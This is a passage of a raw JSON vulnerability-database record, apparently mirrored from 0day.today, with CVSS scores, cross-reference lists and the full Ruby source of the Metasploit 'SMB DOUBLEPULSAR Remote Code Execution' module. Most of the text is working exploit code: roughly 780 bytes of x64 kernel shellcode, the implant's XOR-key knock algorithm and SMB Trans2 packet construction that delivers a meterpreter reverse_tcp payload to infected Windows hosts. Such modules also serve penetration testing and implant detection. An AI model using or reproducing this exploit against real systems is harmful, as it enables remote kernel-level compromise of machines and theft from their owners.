\"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-19] #"}, "lastseen": "2021-10-18T22:16:33", "differentElements": ["sourceData"], "edition": 48}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "0e0821bc3aa893d37b2809ffca89cdc7", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-20T08:16:37", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-20T08:16:37", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-20T08:16:37", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-20] #"}, "lastseen": "2021-10-20T08:16:37", "differentElements": ["sourceData"], "edition": 49}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "4d12fd8c3d043b07a63f456461a24bf5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-20T22:22:29", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", 